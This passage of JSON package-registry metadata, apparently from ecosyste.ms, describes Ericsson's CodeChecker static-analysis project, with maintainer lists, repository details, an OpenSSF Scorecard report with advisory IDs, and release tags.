/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api-js/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api-js/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api-js/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api-js/related_packages","maintainers":[{"uuid":"gyorb","login":"gyorb","name":null,"email":"o.gyorgy@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~gyorb","role":null,"created_at":"2022-11-11T19:21:33.393Z","updated_at":"2022-11-11T19:21:33.393Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/gyorb/packages"},{"uuid":"csordasmarton","login":"csordasmarton","name":null,"email":"csordasmarton92@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~csordasmarton","role":null,"created_at":"2022-11-11T19:21:33.400Z","updated_at":"2022-11-11T19:21:33.400Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/csordasmarton/packages"},{"uuid":"bruntib","login":"bruntib","name":null,"email":"bruntib@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~bruntib","role":null,"created_at":"2022-11-11T19:21:33.405Z","updated_at":"2022-11-11T19:21:33.405Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bruntib/packages"},{"uuid":"vodorok","login":"vodorok","name":null,"email":"vodorok@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~vodorok","role":null,"created_at":"2022-11-11T19:21:33.409Z","updated_at":"2022-11-11T19:21:33.409Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vodorok/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5134204,"maintainers_count":1052507,"namespaces_count":313823,"keywords_count":730801,"github":"npm","metadata":{"funded_packages_count":155963},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-08T06:45:00.340Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5283436,"name":"codechecker","ecosystem":"conda","description":null,"homepage":"https://github.com/Ericsson/CodeChecker","licenses":"Apache-2.0 WITH LLVM-exception","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Ericsson/CodeChecker","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2021-11-23T00:12:28.000Z","latest_release_published_at":"2021-12-16T01:21:07.000Z","latest_release_number":"6.18.1","last_synced_at":"2025-09-02T07:54:19.985Z","created_at":"2022-10-03T15:39:35.100Z","updated_at":"2025-09-02T07:54:19.985Z","registry_url":"https://anaconda.org/conda-forge/codechecker","install_command":"conda install -c conda-forge codechecker","documentation_url":null,"metadata":{},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://re